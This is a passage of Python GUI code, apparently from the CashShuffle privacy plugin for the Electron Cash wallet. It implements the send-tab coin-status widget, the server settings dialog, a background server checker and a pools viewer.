self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: GUI refresh() wil later also set this string but we set it immediately here so UI feel peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limied. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one o the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # slot won't get called from setting radio buttons programmaticallys, so we force-call the slot
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstrat Base class -- do not instantiate this as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab which interit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed' means connecton failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.statusChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
